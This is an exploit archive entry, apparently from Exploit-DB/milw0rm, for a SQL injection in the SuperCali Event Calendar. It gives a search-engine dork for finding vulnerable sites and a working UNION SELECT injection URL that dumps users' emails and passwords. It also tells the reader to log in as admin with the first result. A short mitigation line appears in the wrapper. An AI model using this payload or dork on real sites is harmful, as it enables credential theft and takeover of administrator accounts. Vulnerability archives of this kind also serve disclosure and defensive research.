SuperCali Event Calendar SQL Injection Vulnerability

vendor:

Event Calendar

by:

t0pP8uZz & xprog

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Event Calendar

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

SuperCali Event Calendar SQL Injection Vulnerability

Pull out members info from the database.

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    SuperCali Event Calendar SQL Injection Vulnerbility             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://supercali.inforest.com/
DORK: allintext:"SuperCali Event Calendar"


DESCRIPTION: 
Pull out members info from the database.


EXPLOITS:
http://www.server.com/index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E706870/**/from/**/users/*

NOTE/TIP: 
normally the first result is admin info, click the upper right link labeled 'manage calender'
to login as admin


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+		    SuperCali Event Calendar SQL Injection Vulnerbility             +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-03]